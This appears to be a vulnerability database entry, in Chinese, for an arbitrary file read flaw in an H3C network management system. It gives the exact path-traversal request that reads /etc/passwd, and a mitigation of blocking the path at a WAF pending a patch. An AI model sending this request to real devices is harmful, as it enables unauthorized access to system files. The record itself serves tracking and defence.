vendor = "H3C"
name = "H3C网络管理系统任意文件读取漏洞"
type = "任意文件读取"
version = "未知"
path = "/webui/?file_name="
detail = "GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "nday"
